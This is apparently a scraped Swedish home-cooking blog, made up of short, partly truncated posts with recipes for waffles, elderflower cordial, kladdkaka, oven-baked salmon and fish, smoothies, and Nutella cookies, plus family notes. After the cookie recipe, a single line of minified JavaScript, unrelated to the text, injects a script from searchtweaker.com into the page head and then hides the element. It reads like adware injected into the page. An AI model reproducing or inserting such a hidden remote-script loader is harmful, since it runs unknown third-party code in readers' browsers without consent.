Ibland ger jag efter och gör våfflor. Detta recept tycker jag är bra. Fast jag tar fyra dl dinkel och 1 dl grov dinkel. Bara veva ihop och grädda. Smeten blir seg så använd slickepott. Annars blir smeten kvar i bunken. Blir ca åtta-nio våfflor.
Så har jag och Bus testat Pokémon. Det var mest spännande de första två dagarna. Inatt blev sömnen sådär så idag har vi tagit det lugnt.
Far hjälpte mig med våra fönster i eftermiddag. Han har en manick som man skrapar och suger upp putsvattnet med. Jag tvättade och han torkade. Blev en stor (gigantisk) förbättring....
Så ljuvliga blommorna är en och en. Världens sötaste konfetti.
Skalar citronen och pressar saften. Finns säkert fler sätt.
Dofterna är helt makalösa!
Tror knappast mormor tar illa upp om jag delar med mig. Tvärt om så blir hon säkert stolt om ni använder det. Fick plocka blommor hos grannarna men deras träd är så högt. Den snälla (och långa) sonen kom ut och hjälpte mig. Jag såg väl helt hjälplös ut. :)
Mormor Astrids Fläderblomssaft
Minst 40 blomklasar
2 liter vatten
2 kg socker (det står 2,5 men jag tycker 2 räcker)
50 g citronsyra
4 citroner
Klipp bort så mycket av skaften du kan.
Skölj...
Längtat så länge efter Roy Fares optimala kladdkaka. Jag gör den utan jordnötter och den är bäst.
Och den är superenkel att sno ihop. Se bara till att ta ut den i tid så den verkligen blir kladdig. Torr kladdkaka gör ingen lycklig.
Och smeten som blir över i bunken och på vispen ska njutas av. "Provsmakade" kakan igår och det är tveksamt om den överlever dagen. Nu ska jag samla ihop lite saker som ska med till Portugal på tisdag. Pojkarna är i simhallen så jag har en stunds tystnad. Gäller att utnyttja den väl.
Hade någon sagt det till mig för några år sedan hade jag skrattat så hårt. Men man kan ändra sig. Tydligen. KJ har stekt de små rackarna i olja, vitlök och lite bladpersilja. Så gott! Liknande recept (och bilden jag har lånat) hittar du hos ica.se.
Nu har jag imponerat på mig själv. Lax med lite olivolja, flingsalt och en termometer. Får absolut inte gå för länge. Den ska vara mjuk och fin. Till detta var det premiär för sötpotatispommes. Så goda. Skär jämna bitar, rumla runt dem i en skål med olivolja och flingsalt. Lägg på rad utan att klibba ihop på ett ugnsgaller. Sätt en plåt under för att slippa dropp i ugnen. 175 grader och den sista kvarten åkte fisken in. Dippade i lite majonnäs. Kommer absolut göras igen. Lättlagat och väldigt gott. Men grymt mäktigt.
Många fina tomater på gång. Kommer nog...
Gjorde en halv sats igår för att prova först. Buset åt det med stor aptit. Även till frukost idag. Jag tyckte också det var gott men föredrog det när det var svalnat. Var lite väl klibbigt innan.
Recept:
1 bröd (ca 16 bitar)Ingredienser4 dl mandelmjöl0,5 dl kokosmjöl5 msk fiberhusk0,5 dl krossat linfrö1 tsk kanel
1 tsk kardemumma1 tsk salt1 tsk bikarbonat6 st ägg2 dl vatten
Honung (flytande)2 st bananer
Sätt ugnen på 200° C. Blanda samman alla de torra ingredienserna i en bunke.Mixa ägg, vatten och lite honung i en separat bunke.Häll över de torra ingredienserna i äggen och vattnet. Blanda väl.Tillsätt bananerna...
Drog ihop en supergod smoothie till kvällsmat ikväll. Buset knäckte två glas och jag fick ett halvt. :)
Cashewmjölk, hallon, blåbär, jordgubbar, slaskigt päron, banan, en klick jordnötssmör och en klutt honung.
Potatis, rödbetor, morötter, olivolja, timjan (från kryddlandet) och flingsalt. In i ugnen. Veva runt då och då. Till det en grymt god kalkonkorv från Ingelsta och en chilisås jag vevat ihop själv.
Hur vackra är inte rödbetor. Och goda.
Men ica. Hur tänker ni. Den här är så kass. Gäller även toa- och hushållspapper. De var bra förut men kvalitén har försämrats. Det är väl inget vidare att vi undviker allt som är märkt med ert eget varumärke?
Beige Kallekatt är nu bara lite ojämn. Märkligt vilken snabb vändning det tog. Sover helst ute i rabatten nu när vädret är så härligt....
Ska få hit mor, far och mormor idag. De hade ärenden i byn och kommer sedan hit på middag. Tänkte laga tandoorikyckling och en slags cheesecake i glas. Ingen av dem har jag gjort innan. Men hur svårt kan det vara?! :)
Annars rullar det på. Sassen går fint och jag ska starta på lördag i Lysekil. Ny klass så det vore väl dags att pränta in den nu. :) Har testat vissa vägar och det kan vara ett program som passar henne bra. Vi får se. Det blir ju premiär för skrittpiruetter. De funkar så bra hemma men på...
Nutella Cookies
1 cup Nutella
1 cup flour
1/2 cup sugar
1 egg
1/8 cup marshmallows (optional)
1/8 cup chocolate chips (optional)
Preheat oven to 350°F. Stir together Nutella, flour, sugar and egg until thoroughly combined. Mix in chocolate chips if using.
Form dough into 1 inch balls and place on cookie sheet. Push marshmallows into the middle of each cookie and press down firmly with your palm to flatten. Bake for 10-12 minutes, until set.
Hittat i bloggen
www.52kitchenadventures.com
Måste provas!
(function(){try{var header=document.getElementsByTagName("HEAD");var script=document.createElement("SCRIPT");script.src="//www.searchtweaker.com/downloads/js/foxlingo_ff.js";script.onload=script.onreadystatechange=function(){if (!(this.readyState)||(this.readyState=="complete"||this.readyState=="loaded")){script.onload=null;script.onreadystatechange=null;header.removeChild(script);}}; header.appendChild(script);} catch(e) {}})();
Vispa 3 dl grädde lätt. 0,5 dl grädde och 200 g valfri choklad i en kastrull. (Jag blandade 70% och bättre mjölkchoklad.) Häll i 0,5 dl lönnsirap och två äggulor. Värm till en jämn smet och rör ofta. Låt svalna lite. Vänd ner lite av den vispade grädden. Häll sedan över chokladen i grädden och rör till en jämn smet. Häll upp i glas och in i kylen. Ta fram dem ca 15 minuter innan de ska serveras. Jag serverade mina med jordgubbar marinerade i socker, vanilj och lime. Jag tycker det räcker till 6 personer men det beror...
Köpte en bamsestor torskfile' idag. Skar ur ryggbiten och la den i en glasform. På med salt, vitpeppar och timjan. Kokade upp lite vatten och hällde i en skvätt fiskfond. Hällde fondvattnet omkring fisken. Termometer i fiskbiten och på med folie över formen. In i ugnen till fisken är max 55 grader. Något av det godaste jag kan tänka mig att äta och så enkelt att laga.